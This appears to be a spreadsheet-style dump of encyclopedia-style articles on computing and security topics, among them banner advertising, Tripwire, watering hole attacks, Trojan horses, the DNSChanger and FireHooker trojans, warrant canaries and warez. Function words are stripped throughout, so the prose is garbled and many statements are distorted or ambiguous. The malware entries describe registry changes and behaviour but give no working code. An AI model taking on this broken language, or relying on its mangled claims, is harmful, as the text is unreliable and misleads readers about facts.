    <t>banner banner form advertising world wide delivered server. this form online advertising entails embedding advertisement page. intended attract traffic website linking website advertiser. many cases, banners delivered central server. this payback system often content provider able internet access supply content first place. usually though, advertisers networks serve advertisements, resulting revshare system higher quality placement. banners function traditional advertisements intended function: notifying consumers product service presenting reasons consumer choose product question, fact first documented hotwired 1996 researchers briggs nigel hollis. banners differ results advertisement campaigns monitored real-time targeted viewer's interests. behavior often tracked click tag. many surfers regard advertisements annoying distract page's actual content waste bandwidth. cases, banners cover screen content user wishes see. newer browsers often include software "adblocker" options disable pop-ups block images selected websites. another avoiding banners proxy server blocks them, privoxy. browsers also extensions available block banners, example adblock plus mozilla firefox, adthwart google chrome ie7pro internet explorer. history banner played significant role enabling rapid development paid advertising internet.the pioneer online advertising prodigy, company owned sears time. prodigy used online advertising first promote sears products 1980s, advertisers, including aol, prodigy's direct competitors. prodigy unable capitalize first mover advantage online advertising. first clickable (which later came known term "banner ad") sold global network navigator (gnn) 1993 heller, ehrman, white, mcauliffe, defunct firm silicon valley office. first commercially supported publication first commercial websites.for many years, hotwired regarded inventor digital banner first site sell banner large quantities wide range major corporate advertisers. andrew anker hotwired's first ceo. rick boyce, former media buyer francisco advertising agency riney partners, spearheaded sales effort company. hotwired coined term "banner first company provide click rate reports customers. first banner sold hotwired paid at&amp;t corp. online october 1994. another source also credits hotwired october 1994, coors' "zima" campaign first banner. 1994, mccarthy mentored boyce transition traditional online advertising first introduced concept clickable/trackable stated believed direct response model—in return investment individual measured—would prove sustainable long online advertising. spite prediction, banner valued sold based number impressions generated. however, time warner's pathfinder (website), launched october 1994, week hotwired, three days earlier included banner ads. walter isaacson, president time inc. media, columbia journalism review, credit bruce judson, general manager time inc. media, inventing concept banner interview harvard's shorenstein center media, politics public policy, history internet, isaacson discussed judson's contribution, saying, really transformed everything. immediately, madison avenue decided, god, we’ve understand this. hire young people.' they would send money. almost like could look time-life building madison avenue, watch people walking bags money, dump desk, bruce judson’s desk, banner ads."the first central server released july 1995 focalink communications, enabled management, targeting, tracking online ads. local server quickly followed netgravity january 1996. technology innovation server, together sale online impression basis, fueled dramatic rise proliferation advertising provided economic foundation industry period 1994 2000. online advertising model emerged early years 21st century, introduced goto.com (later overture, yahoo! mass marketed google's adwords program), relies heavily tracking response rather impressions. standard sizes sizes standardized extent iab. prior standardization, banner appeared different sizes. however, websites advertising networks (outside eurosphere north america) base sizes. sizes 2007 notes 2015, announced advertising creative guidelines display mobile, considering html5.in 2017, also introduced guidelines, featuring adjustable formats, well guidelines digital content experiences augmented reality (ar), virtual reality (vr), social media, mobile video, emoji messaging, 360-degree video ads.fixed size spec standard banners included iab's universal package units guidelines supported major serving companies. this particularly relevant members adform, appnexus, chitika, conversant, epom, hiro, mixpo, spotxchange, zedo, many others. additionally, serving providers offer other, non-standard banner sizes technologies, well support different online advertising formats (e.g. native ads). however, standard banner sizes constantly evolving consumer creative fatigue banner blindness. companies consistently test performance units ensure maximum performance clients. updated guideline bi-annually. some publishers known unique, custom executions include buzzfeed, craveonline, quartz (publication), thought catalog, elite daily, vice media, inc., (media company), many others. according media research firm emarketer, types custom executions publisher direct buys rise, native advertising spending $4.3 billion 2015. other types banners restricted online advertising. website designs often non-advertising banners, also known "hero images," aesthetic reasons. hero images represented large photos, graphics, videos placed prominent sections website.a "live banner" banner created dynamically time display, instead pre-programmed fixed content. live banners built using technologies adobe flash, java, microsoft silverlight, usually employ animation together text, images, graphics, sounds video catch viewer's attention. depending banner design, multimedia elements defined dynamic therefore variable. also references</t>
  </si>
  <si>
    <t>Tripwire (company)</t>
  </si>
  <si>
    <t>tripwire, inc. software company based portland, oregon focuses security compliance automation. subsidiary technology company belden. history tripwire's intrusion detection software created 1990s purdue university graduate student gene professor gene spafford. 1997, gene co-founded tripwire, inc. rights tripwire name technology, produced commercial version, tripwire servers. 2000, tripwire released open source tripwire.in 2005, firm released tripwire enterprise, product configuration control detecting, assessing, reporting remediating file configuration changes. january 2010, announced release tripwire center, security information event management (siem) software stores, correlates reports security event data. products integrated enable correlation change event data. august 2009, firm acquired activeworx technologies crosstec corporation. revenues grew million 2009. october 2009, company employees; number grew june 2010.by may–june 2010, company 5,500 customers announced filed registration statement securities exchange commission proposed initial public offering common stock. year later, company announced sale private equity firm thoma bravo, ending million plans. johnson cited firm's failure reach $100 million revenue milestone 2010 well changing market expectations reasons going ipo. following acquisition, company laid employees.tripwire acquired ncircle, focused asset discovery vulnerability management, 2013.in december 2014, belden announced plans tripwire $710 million. acquisition completed january 2015. february 2022, belden announced sell tripwire helpsystems. references</t>
  </si>
  <si>
    <t>Softonic.com</t>
  </si>
  <si>
    <t>softonic.com portal based barcelona, catalonia, spain. founded june 1997 owned softonic international. history softonic started 1996 file-oriented download service called shareware intercom, intercom online (grupo intercom), provider internet services cerdanyola vallès, near barcelona (catalonia, spain). files website originally came "files library intercom bbs" intercom online, using "5-step semi-automated process", later greatly simplified. company also offered monthly software library users tired "having wait downloads complete exorbitant phone bills." 1999, service described "generosity games, antivirus, education long, seductive etcetera." 2000, company became independent name softonic. 2004, softonic made available german, 2005, english. initially service oriented downloads windows software, evolved offer software downloads mobile platforms. softonic listed "best place work spain (100–250 employees)" annual study great place work institute 2009–2011, second-best 2008. 2009 2011, site listed unique visitor traffic spain audit bureau interactiva.at 2014, softonic announced headcount reduction procedure would carried cost-cutting measure, allegedly financial organizational reasons. december, company formalized dismissal employees, initial estimation 207.in february, 2015, softonic announced industry veteran download.com co-founder scott arpajian appointed softonic, replacing founder tomás diago.in july 2016, softonic announced partnership business software platform crozdesk.in 2017, company announced hired international executive sophie bernard vice president strategy. october 2019, softonic acquired ghacks. controversies softonic's "softonic downloader" described company's "facilitated behaviour amongst third party vendors ended harming user" malicious links impersonating downloader itself. march 2015, softonic announced discontinuing downloader part move "regain trust users". references</t>
  </si>
  <si>
    <t>Syncplicity</t>
  </si>
  <si>
    <t>syncplicity file share synchronization service developed syncplicity inc. service lets users store synchronize files computers. supports microsoft windows macos. history service initially available beta test, became public 2008.in late 2010, client intel-based macintosh computers running version 10.6 later released.on 2012, syncplicity, inc. acquired corporation.in july 2015, skyview capital, global private investment firm, purchased syncplicity emc.in february 2017, axway purchased syncplicity skyview capital. account types syncplicity offers free paid accounts. other file synchronization services several file synchronization backup services launched around time syncplicity, including live mesh, dropbox, sugarsync. syncplicity allows synchronization online services including google docs, zoho, facebook. documents synchronised associated google docs account windows macintosh computers; however, documents uploaded free google docs accounts converted google docs file formats conversion supported, otherwise ignored. photos synchronised facebook albums. online services including scribd piknik supported syncplicity. reviews 2008, syncplicity rated second best synchronization software behind dropbox lifehacker reader poll, pcworld's reviewer called syncplicity pick among sync services". later review (under ownership) found syncplicity might able compete well dropbox sugarsync price storage, features, including security availability, might attractive business users. free version offers less storage free services. also comparison file hosting services comparison file synchronization software comparison online backup services cloud storage remote backup service references external links syncplicity website syncplicity</t>
  </si>
  <si>
    <t>Triton (content delivery)</t>
  </si>
  <si>
    <t>triton digital delivery digital rights management service created digital interactive streams, abruptly went business early october 2006. triton competitor rapidly growing market electronic distribution video games. triton used serve budget-oriented games publishers strategy first global star software, known distributing prey. history triton launched november 2004, name game xstream. service signed several smaller publishers shortly thereafter, announced first high-profile deal 2005, signing realms in-development prey. game xstream renamed current title triton 2006. early october, 2006, owners prey purchased triton began complain problems purchasing game, activating reaching customer service. realms' webmaster siegler managed find triton digital interactive streams gone business suddenly apparently without warning.a follow-up royal o'brien triton said prey owners triton lose game. patch development remove dependency live system allow back up/copy play games. however, customers purchased game triton receive retail copy.prey released valve's steam service, allows existing prey owners register game steam entering activation code, including bought prey triton. game however, longer available purchase steam. technology although similar competing services, primary selling point triton "dynamic streaming" technology, allows games played completely downloaded content sent client needed. games service required user online able play purchased games. references</t>
  </si>
  <si>
    <t>Watermark (data synchronization)</t>
  </si>
  <si>
    <t>watermark describes object predefined format provides point reference systems/datasets attempting establish delta/incremental synchronization; object queried data source created, modified/changed, and/or deleted watermark value established qualified "above watermark" could/should returned delta-querying partner methodology watermark term often used directory synchronization software development projects. example, products microsoft exchange server, active directory, active directory application mode (adam), microsoft identity integration server 2003/ microsoft identity lifecycle manager server 2007, well cisco unified communications manager microsystems iplanet ldap-based directory products using dirsync consequently consume "watermark" object provide efficient synchronization directories. watermark object sometimes referred "cookie". dirsync control implementation differ product product, however concept watermark allow product read changes directory incrementally. dirsync control lightweight directory access protocol (ldap) server extension enables program search active directory partition objects changed. when program performs dirsync search, program creates cookie identifies directory state time earlier dirsync query. with first search, program creates empty cookie active directory returns objects satisfy query. active directory also returns updated cookie passed next search obtain changes made since first search. this process repeated search. also watermark (disambiguation) microsoft active directory microsoft identity integration server high-water mark (computer security) references external links understanding profiles miis 2003 microsoft publishes open directory-synchronization interface understanding directory ldap control directory</t>
  </si>
  <si>
    <t>Quarantine (antivirus program)</t>
  </si>
  <si>
    <t>quarantine antivirus software early automatically isolated infected files computer's hard disk. files quarantine longer capable infecting hosting system. development release december, 1988, shortly morris worm, work started quarantine, anti-malware file reliability product. released april, 1989, quarantine first product file signature instead viral signature methods.the original quarantine used hunt's b-tree database files crc16 crc-ccitt signatures. doubling signatures rendered useless, least immoderately difficult, attacks based invariant modifications. release april 1990, used crc-32 signature based crc-32 bits word shuffled. subsequent ms-av microsoft, designed check point, apparently relied eight checksum—at least thousand files hundreds identical signatures. functionality quarantine allowed suspect files deleted moved quarantine area flagged report standard executables scanned, could twenty file matching patterns twenty exclusion patterns available twenty directory paths could included, twenty excludedthe 1990 version also allowed background processing checking executables libraries file opened timing checks, e.g. opened word file, word libraries could checked: immediately every half hour once every days, etc.quarantine allowed system managers track modifications selected files file structures, hence quarantine users also early warnings failing disks disk interface cards. achievements 1990 quarantine received magazine, best year, security award. year "quarantine" reportedly responsible finding first stealth virus university toronto, pattern matching virus detectors failed. legacy efforts expenses convert quarantine platforms went unrewarded tripwire's 1991 copy quarantine *nix better funded publicized ondisk could afford match. later efforts include modularized reliability intrusion approaches include either sha-1 signatures, like. quarantine stopped shipping 1994. references</t>
  </si>
  <si>
    <t>Watering hole attack</t>
  </si>
  <si>
    <t>watering hole computer attack strategy attacker guesses observes websites organization often uses infects malware. eventually, member targeted group become infected. hacks looking specific information attack users coming specific address. this also makes hacks harder detect research. name derived predators natural world, wait opportunity attack prey near watering holes. defense techniques websites often infected zero-day vulnerabilities browsers software. defense known vulnerabilities apply latest software patches remove vulnerability allowed site infected. this assisted users ensure software running latest version. additional defense companies monitor websites networks block traffic malicious content detected. examples 2012 council foreign relations december 2012, council foreign relations website found infected malware zero-day vulnerability microsoft's internet explorer. attack, malware deployed users using internet explorer english, chinese, japanese, korean russian. 2013 havex software supply chain attack havex discovered 2013 five known industrial control system (ics) tailored malware developed past decade. energetic bear began utilizing havex widespread espionage campaign targeting energy, aviation, pharmaceutical, defense, petrochemical sectors. campaign targeted victims primarily united states europe.havex exploited supply chain watering-hole attacks vendor software addition spear phishing campaigns gain access victim systems. 2013 department labor mid-early 2013, attackers used united states department labor website gather information users' information. this attack specifically targeted users visiting pages nuclear-related content. 2016 polish banks late 2016, polish bank discovered malware computers belonging institution. believed source malware server polish financial supervision authority. there reports financial losses result hack. 2017 montreal-based international civil aviation organization attack there organization-level watering-hole attack montreal 2016-2017 unknown entity causing data breach. 2017 ccleaner attack from august september 2017, installation binary ccleaner distributed vendor's download servers included malware. ccleaner popular tool used clean potentially unwanted files windows computers, widely used security-minded users. distributed installer binaries signed developer's certificate making likely attacker compromised development build environment used insert malware. 2017 notpetya attack june 2017, notpetya (also known expetr) malware, believed originated ukraine, compromised ukrainian government website. attack vector users site downloading malware erases contents victims' hard drives. 2018 chinese country-level attack there country-level watering-hole attack china late 2017 march 2018, group "luckymouse" also known "iron tiger", "emissarypanda", "apt "threat group-3390." 2019 holy water campaign 2019, watering-hole attack, called holy water campaign, targeted asian religious charity groups. victims prompted update adobe flash triggered attack. creative distinct fast evolution. motive remains unclear. experts provided detailed technical analysis along long list indicators compromise (iocs) involved campaign, none could traced back advanced persistent threat. references</t>
  </si>
  <si>
    <t>Tresorit</t>
  </si>
  <si>
    <t>tresorit cloud storage service end-to-end encryption.founded 2011, tresorit closed €11.5m series financing round 2018 featured ft1000 financial times 2020 fifth fastest-growing cybersecurity company europe. software available windows, macos, android, ios, linux, company released plugins gmail outlook. 2022, swiss post owns majority stake cloud storage service. tresorit works independent entity swiss post. company offices zurich, switzerland; munich, germany; budapest, hungary, employing around people. history tresorit founded 2011 istvan (ceo), szilveszter szebeni (cio) gyorgy szilagyi (cpo). coming years, andrea skaliczki joined cfo, istvan hartung arno züren cso. company officially launched client-side encrypted cloud storage service emerging stealth beta version april 2014. 2013 2014, tresorit hosted hacking contest offering $10,000 anyone hacked data encryption methods gain access servers. after months, reward increased $25,000 later $50,000, challenging experts institutions like harvard, stanford mit. contest days according company, nobody able break encryption.in august 2015, wuala (owned lacie seagate), pioneer secure cloud storage, announced closing service years recommended users choose tresorit secure cloud alternative.in 2016, tresorit launched beta software development (sdk) zerokit. january 2017, apple's project carekit announced option mobile developers using carekit integrate zerokit, enabling zero-knowledge user authentication encryption medical health apps.in 2017, tresorit patented shareable encryption technology 9563783 logmein co-founder marton anka joined tresorit investor advisor.in 2019, tresorit reached number employees, tresorit improved governance feature e-mail verification detailed user reports. july 2021, tresorit acquired swiss post expand presence core german-speaking markets, including germany, austria, switzerland. technology tresorit uses encryption. with tresorit’s end-to-end encryption, every file relevant metadata user devices encrypted unique, randomly generated encryption keys. these keys never sent tresorit’s servers unencrypted format. accessing files possible user's unique private decryption key.tresorit uses random keys file random version file. company claims identical files look completely different encryption, thus cannot compared matched.due zero-knowledge system, tresorit store passwords, user access his/her password. administrators business tresorit account reset passwords exceptional cases never access those. awards 2017, tresorit named rising stars deloitte’s technology fast central europe award. 2019, tresorit named global leader cloud computing stratus awards. 2020, tresorit named 2020 gartner peer insights customers’ choice content collaboration tools featured ft1000 financial times 2020 fifth fastest-growing cybersecurity company europe. also comparison file hosting services comparison online backup services remote backup service references</t>
  </si>
  <si>
    <t>Rescator</t>
  </si>
  <si>
    <t>rescator name ukrainian hacker specialising sale credit card details. according russian cyber-security consultancy group-ib, "rescator" (aka helkern ikaikki) runs marketplace rescator.cc uploaded million card details onto swiped carder marketplace.credit card details stolen places like minnesota united kingdom, website allows searches code stolen card numbers cashed locally victim avoid alerting banks. unlike defunct carding forums, site free use, payments requiring direct bitcoin payments sellers without escrow features common darknet markets. many stolen details target, home depot sally beauty data breaches ended site. march 2014, site briefly defaced rival hacker."the rescator" nickname major character well-known angelique series historical novels. character depicted pirate whose acts clearly illegal still morally defensible, always wears mask whose true identity remains unknown many volumes series. references</t>
  </si>
  <si>
    <t>Trojan horse (computing)</t>
  </si>
  <si>
    <t>computing, trojan horse malware misleads users true intent. term derived ancient greek story deceptive trojan horse fall city troy.trojans generally spread form social engineering; example, user duped executing email attachment disguised appear innocuous (e.g., routine form filled in), clicking fake advertisement social media anywhere else. although payload anything, many modern forms backdoor, contacting controller unauthorized access affected computer. ransomware attacks often carried using trojan. unlike computer viruses, worms, rogue security software, trojans generally attempt inject files otherwise propagate themselves. term it's clear concept, term first used, 1971 first unix manual assumed readers knew both: also, change owner file set—user—id otherwise could create trojan horses able misuse other’s files. another early reference force report 1974 analysis vulnerability multics computer systems.it made popular thompson 1983 turing award acceptance lecture "reflections trusting trust", subtitled: extent trust statement program free trojan horses? perhaps important trust people wrote software. mentioned knew possible existence trojans report security multics. behavior once installed, trojans perform range malicious actions. many tend contact command control (c2) servers across internet await instruction. since individual trojans typically specific ports communication, relatively simple detect them. moreover, malware could potentially "take over" trojan, using proxy malicious action.in german-speaking countries, spyware used made government sometimes called govware. govware typically trojan software used intercept communications target computer. some countries like switzerland germany legal framework governing software. examples govware trojans include swiss minipanzer megapanzer german "state trojan" nicknamed r2d2. german govware works exploiting security gaps unknown general public accessing smartphone data becomes encrypted applications.due popularity botnets among hackers availability advertising services permit authors violate users' privacy, trojans becoming common. according survey conducted bitdefender january june 2009, "trojan-type malware rise, accounting global malware detected world." trojans relationship worms, spread help given worms travel across internet them. bitdefender stated approximately computers members botnet, usually recruited trojan infection. linux example trojan horse program purports perform obvious function, upon execution compromises user's security. easy program version linux sudo command. command copied publicly writable directory like /tmp. administrator happens directory executes sudo, trojan horse might executed. here working version: prevent command-line based trojan horse, entry path= environment variable located tail end. example: path=/usr/local/bin:/usr/bin:.. notable examples private governmental anom 0zapftis r2d2 staatstrojaner digitask darkcomet finfisher lench solutions gamma international davinci galileo hackingteam magic lantern sunburst svr/cozy bear (suspected) quantum/foxacid warrior pride gchq publicly available egabtr late 1980s netbus 1998 (published) sub7 mobman 1999 (published) back orifice 1998 (published) beast 2002 (published) bifrost trojan 2004 (published) darkcomet 2008-2012 (published) blackhole exploit 2012 (published) gh0st 2009 (published) megapanzer bundestrojaner 2009 (published) memz leurak 2016 (published) detected security researchers twelve tricks 1990 clickbot.a 2006 (discovered) zeus 2007 (discovered) flashback trojan 2011 (discovered) zeroaccess 2011 (discovered) koobface 2008 (discovered) vundo 2009 (discovered) coreflood 2010 (discovered) tiny banker trojan 2012 (discovered) shedun android malware 2015 (discovered) capitalization computer term "trojan horse" derived legendary trojan horse ancient city troy. reason "trojan" often capitalized. however, style guides dictionaries differ, many suggest lower case "trojan" normal use. also computer security cuckoo's (metaphor) cyber spying dancing pigs exploit (computer security) industrial espionage phishing principle least privilege privacy-invasive software remote administration remote administration software reverse connection rogue security software scammers technical support scam timeline computer viruses worms zombie (computer science) references external links media related trojan horse (malware) wikimedia commons "cert advisory ca-1999-02 trojan horses" (pdf). carnegie mellon university software engineering institute. archived original october 2000. retrieved september 2019.</t>
  </si>
  <si>
    <t>Trojan.Win32.DNSChanger</t>
  </si>
  <si>
    <t>trojan.win32.dnschanger backdoor trojan redirects users various malicious websites means altering settings victim's computer. malware strain first discovered microsoft malware protection center december 2006 later detected mcafee labs april 2009. behaviour changer trojans dropped onto infected systems means malicious software, tdss koobface. trojan malicious windows executable file cannot spread towards computers. therefore, performs several actions behalf attacker within compromised computer, changing settings order divert traffic unsolicited, potentially illegal and/or malicious domains.the win32.dnschanger trojan used organized crime syndicates maintain click fraud. user's browsing activity manipulated various means modification (such altering destination legitimate link forwarded another site), allowing attackers generate revenue pay-per-click online advertising schemes. trojan commonly found small file (+/- kilobytes) designed change nameserver registry value custom address domain encrypted body trojan itself. result change, victim's device would contact newly assigned server resolve names malicious webservers.trend micro described following behaviors win32.dnschanger: steering unknowing users malicious websites: these sites phishing pages spoof well-known sites order trick users handing sensitive information. user wants visit itunes site, instance, instead unknowingly redirected rogue site. replacing legitimate sites: visiting certain sites serve users infected systems different whose systems infected. controlling redirecting network traffic: users infected systems granted access download important software updates vendors like microsoft respective security vendors. pushing additional malware: infected systems prone malware infections (e.g., fakeav infection). alternative aliases win32:kdcrypt[cryp] (avast) tr/vundo.gen (avira) memscan:trojan.dnschanger (bitdefender labs) win.trojan.dnschanger (clamav) variant win32/trojandownloader.zlob (eset) trojan.win32.monder (kaspersky labs) troj/dnscha (sophos) mal_zlob (trend micro) malwarescope.trojan.dnschange (vba32 antivirus) other variants trojan.win32.dnschanger.alf-secure, cybersecurity company, received samples variant named paypal-2.5.200-mswin32-x86-2005.exe. case, paypal attribution indicated phishing attack likely. trojan programmed change server name victim's computer address 193.227.xxx.xxx range.the registry affected trojan hklm\system\controlset001\services\tcpip\parameters\interfaces\nameserverother registry modifications made involved creation keys: hklm\system\currentcontrolset\services\tcpip\parameters\interfaces\{random}, dhcpnameserver 85.255.xx.xxx,85.255.xxx.xxx hklm\system\currentcontrolset\services\tcpip\parameters\interfaces\{random}, nameserver 85.255.xxx.133,85.255.xxx.xxx hklm\system\currentcontrolset\services\tcpip\parameters\, dhcpnameserver 85.255.xxx.xxx,85.255.xxx.xxx hklm\system\currentcontrolset\services\tcpip\parameters\, nameserver 85.255.xxx.xxx,85.255.xxx.xxx also dnschanger hijacking rove digital case zlob trojan references external links changer trojans direct users threats trendmicro fbi: operation ghost click (f-secure) ‘biggest cybercriminal takedown history’ (brian krebs krebsonsecurity.com) analysis dnschanger file virustotal</t>
  </si>
  <si>
    <t>Warrant canary</t>
  </si>
  <si>
    <t>warrant canary method communications service provider aims inform users provider served government subpoena despite legal prohibitions revealing existence subpoena. warrant canary typically informs users court-issued subpoena particular date. canary updated period specified host warning removed, users might assume host served subpoena. intention provider passively warn users existence subpoena, albeit violating spirit court order violating letter order. some subpoenas, covered u.s.c. §2709(c) (enacted part patriot act), provide criminal penalties disclosing existence subpoena third party, including service provider's users.national security letters (nsl) originated 1986 electronic communications privacy originally targeted suspected agents foreign power. targeting agents foreign power revised patriot 2001 allow nsls target information thought relevant either counterintelligence activities terrorists activities directed united states. idea using negative pronouncements thwart nondisclosure requirements court orders served secret warrants first proposed steven schear cypherpunks mailing list, mainly uncover targeted individuals isps. also suggested used public libraries 2002 response patriot act, could forced librarians disclose circulation history library patrons. etymology term allusion practice coal miners bringing canaries mines early-warning signal toxic gases, primarily carbon monoxide methane. birds sensitive gases humans, became sick miners, would chance escape protective respirators. usage first commercial warrant canary cloud storage provider rsync.net, began publishing canary 2006. addition digital signature, provides recent news headline proof warrant canary recently posted well mirroring posting internationally.on november 2013, apple became prominent company publicly state never received order user data section patriot act. september 2014, gigaom reported warrant canary statement appear anymore next apple transparency reports, covering july–december 2013 january–june 2014. tumblr also included warrant canary transparency report issued february 2014. august 2014, online cloud service spider implemented encrypted warrant canary publishes "all clear!" message every months. three signatures geographically distributed signers must sign message—so government agency forced spideroak update page, would need enlist help three signers.in september 2014, u.s. security researcher moxie marlinspike wrote "every lawyer i've spoken indicated 'canary' remove choose update would likely legal consequences simply posting something explicitly says received something."in march 2015 reported australia outlawed certain kind warrant canary, making illegal "disclose information existence non-existence" journalist information warrant issued mandatory data retention laws. afterwards, computer security privacy specialist bruce schneier wrote blog post "[p]ersonally, never believed [warrant canaries] would work. relies fact prohibition speaking prevent someone speaking. courts generally impressed sort thing, easily imagine secret warrant includes prohibition triggering warrant canary. know, right secret legal proceedings issue." this first australian outlaw warrant canaries. “telecommunications (interception) amendment 1995” probably first, making illegal "disclose information existence non-existence" interception warrants. that said, case specific united states would render covert continuance warrant canaries subject constitutionality challenges. west virginia state board education barnette wooley maynard rule free speech clause prohibits compelling someone speak one's wishes; easily extended prevent someone compelled lie. york times united states protects exercising first amendment publish government information, even wishes government, except grave exceptional circumstances previously precedent. latter[?] also carries weight acting direct government intervention similar government intervention warrant canary. companies organizations longer warrant canaries following non-exhaustive list companies organizations whose warrant canaries longer appear transparency reports: apple reddit silent circle canary watch 2015, coalition organizations consisting eff, freedom press foundation, law, calyx institute, berkman center created website called canary watch order provide compiled list companies providing warrant canaries. mission provide prompt updates changes canary's state. often difficult users ascertain canary's validity thus canary watch aimed provide simple display active canaries blocks time active. 2016, announced canary watch "will longer accept submissions canaries monitor existing canaries changes take downs". coalition organizations created canary watch explained decision discontinue project stating achieved goals raise awareness "illegal unconstitutional national security process, including national security letters secret court processes." electronic frontier foundation also noted "the fact canaries non-standard makes difficult automatically monitor changes takedowns." they explained project course, ample attention brought canaries, detailed warrant canary strengths weaknesses observed. examples 2016, riseup failed update warrant canary, sealed warrants court. canary since updated, longer states absence orders. also animal sentinel contraposition, element logic implemented warrant canary patriot act, title national security authorities transparency report wikileaks-related twitter court orders references further reading kurt opsahl april 2014). "warrant canary frequently asked questions". electronic frontier foundation. external links dictionary definition warrant canary wiktionary</t>
  </si>
  <si>
    <t>Quasi Universal Intergalactic Denomination</t>
  </si>
  <si>
    <t>quasi universal intergalactic denomination (quid) proposed "space currency" created viral marketing campaign launched travelex london-based public relations advertising firm, talkpr. full name backronym 'quid', slang term british pound. campaign stated travelex launching form money space tourists sharp edges, chemically inert, advantages paper money. quid after coming idea space-money campaign, talkpr travelex contacted national space centre, whose employees presented number mockups made campaign artists asked select one. result series circular clear discs colored centers, symbolizing eight planets solar system inside, denominations ranging each quid coin would unique code number, similar serial number paper currency, allow tracking, prevent counterfeiting. travelex stated planned work bank england begin registering quid possible legal currency future.on october 2007, one-page press statement announcing quid released placed united press international press release newswire. campaign launched midst intense press coverage virgin galactic news. story picked major news agencies soon after, science magazines technological blog writers weighed topic, calling "useless" "nonsense", spreading story.statements members university leicester (who started nsc) added campaign release. when campaign concluded, received resulting coins display space|now display. also space adventures space colonization commercial astronaut space tourism society list private spaceflight companies references external links dvice: travelex quid: "intergalactic currency" next trip space communis blog: space space money</t>
  </si>
  <si>
    <t>Trojan.Win32.FireHooker</t>
  </si>
  <si>
    <t>trojan.win32.firehooker trojan:win32/firehooker definition (from kaspersky labs) trojan downloader, trojan dropper, trojan created windows platform. first known detection goes back september, 2015, according trend micro. additional info this malware requires main component successfully perform intended routine .dll-file, name xul.dll. file-size 5120 bytes. file dropped blocking installer additional installers bundled dnsblockers. xul.dll, known mozilla firefox dll, loads order come action following apis dll-file: cert_getcommonname nss_cmssignerinfo_getsigningcertificate nss_cmssignerinfo_verify port_set_error vfy_verifydigestdirect other aliases tr/firehooker.1825 (avira) trojan.generickd.2889803 (bitdefender) win32/firehooker.a (eset) trojan.win32.firehooker.a (kaspersky labs) external links analysis file virustotal references</t>
  </si>
  <si>
    <t>Warez</t>
  </si>
  <si>
    <t>warez common computing broader cultural term referring pirated software (i.e. illegally copied, often deactivation anti-piracy measures) distributed internet. warez used commonly noun, plural form ware (short computer software), intended pronounced like word wares circumvention copy protection (cracking) essential step generating warez, based common mechanism, software-focused definition extended include copyright-protected materials, including movies games. global array warez groups referred "the scene", deriving earlier description "the warez scene". distribution trade copyrighted works without payment fees royalties generally violates national international copyright laws agreements. term warez covers supported well unsupported (abandonware) items, legal prohibitions governing creation distribution warez cover profit-driven "enthusiast" generators distributors items. terminology warez, leetspeak form w4r3z, plural representations word "ware" (short computer software), terms used refer "[p]irated software distributed internet," "[s]oftware illegally copied made available" e.g., "protection codes de-activated". "cracking", circumventing copy protection, essential part warez process," commonality, definition focused computer software extended include forms material copyright protection, especially movies. aaron schwabach notes, term covers supported unsupported materials (the latter unsupported, termed abandonware), legal recourses aimed stemming creation distribution warez designed cover profit-driven "enthusiast" practitioners. hence, term refers copyrighted works distributed without fees royalties traded general violation copyright law.the term warez, intended pronounced like word "wares" (/ˈwɛərz/), coined 1990s; origin unknown member underground computing circle, since become commonplace among internet users mass media. used commonly noun: neighbour downloaded gigabytes warez yesterday"; also used verb: "the windows warezed month company officially released it". global collection warez groups referred "the warez scene," ambiguously "the scene.": p.72 while term 'piracy' commonly used describe significant range activities, unlawful, relatively neutral meaning context "...mak[ing] reproduc[ing] work another without authorization". some groups (including project free software foundation, fsf) object words "theft" represent attempt create particular impression reader:publishers often refer prohibited copying "piracy." way, imply illegal copying ethically equivalent attacking ships high seas, kidnapping murdering people them. advocates terms like "prohibited copying" "unauthorized copying", "sharing information neighbor." hence, term "software pirate" controversial; derides use, many self-described pirates take pride term, groups (e.g., pirates attitudes) fully embrace it.direct download [ddl] sites locations index links locations files directly downloaded user's computer; many sites link free file hosting services, hosting materials. sites directly host material avoid fees normally accompany large file hosting. motivations arguments production and/or distribution warez illegal countries protections provided trips agreement. software infringers generally exploit international nature copyright issue avoid enforcement specific countries. violations typically overlooked poorer third world countries, countries weak non-existent protection intellectual property. additionally, first world countries loopholes legislation allow warez continue.there also movement, exemplified groups like pirate party scholars mises institute, idea intellectual property anathema free society. this contrast traditional open source advocates lawrence lessig, advocate middle ground freedom intellectual property. legality generally, four elements criminal copyright infringement: existence valid copyright, copyright infringed, infringement willful, infringement either substantial, commercial gain levels often statute). offering warez generally understood form copyright infringement punishable either civil wrong crime.: often sites hosting torrent files claim breaking laws offering actual data, rather link places peers contain infringing material. however, many prosecution cases convictions argue contrary. instance, dimitri mader, french national operates movie distribution warez site, wawa-mania, fined 20,000 sentenced, absentia, year jail european court (after fleeing france philippines), role managing site. u.s., 2004, individuals prosecuted convicted trade warez products (under statutes), movie software pirating particular, number individuals imprisoned, including enthusiast traders.: p.308 however, laws application warez activities vary greatly country country; instance, wawa-mania sanction france, remains operation host moldova, ecuadorian top-level domain. hence, high-profile hosts domain providers generally permit hosting warez, delete sites found hosting them, private endeavours small commercial entities continue allow trade warez continue. and, countries, times, software "piracy" encouraged, international usual national legal protections ignored. dispute iran united states membership subsequent u.s. block iran's attempts full-membership iran encourage copying u.s. software; hence, subsequent surge iranian "warez" "crackz" websites iranian laws forbid hosting inside iran). policy adopted antigua, others. distribution warez often distributed outside scene collection warez groups) torrents (files including tracker info, piece size, uncompressed file size, comments, vary size uploaded popular website associate friend cracker cracking crew. file id.diz often made promote created release. leeched (downloaded) users tracker spread sharing sites using p2p, sources newsgroups. from there, downloaded millions users world. often, release duplicated, renamed, re-uploaded different sites eventually, become impossible trace original file. another increasingly popular method distributing warez one-click hosting websites. early 1990s, warez often published bulletin boards warez section. rise software infringement unauthorized copying ongoing phenomenon started high quality, commercially produced software released sale. whether medium cassette tape floppy disk, cracking enthusiasts found duplicate software spread without permission maker. thriving bootlegging communities built around apple commodore atari atari line, spectrum, amiga, atari among personal computers. entire networks bbses sprang traffic illegal software user next. machines like amiga commodore international network, software available continent would eventually make every region bulletin board systems. also quite common 1980s physical floppy disks postal service spreading software, activity known mail trading. prior sale software came cd-rom discs hard drives become available, software require floppy disc drive starting using program. user could install onto his/her computer mail disk next person, could same. particularly widespread continental europe, mail trading even used many leading cracker groups primary channel interaction. software copyright violation mail trading also common means many computer hobbyists eastern bloc countries receive western software computers. copy-protection schemes early systems designed defeat casual duplication attempts, "crackers" would typically release copied game "pirate" community earmarked market. famous event history software copyright policy open letter written bill gates microsoft, dated february 1976, argued quality available software would increase "software piracy" less prevalent. however, early 1990s, software copyright infringement 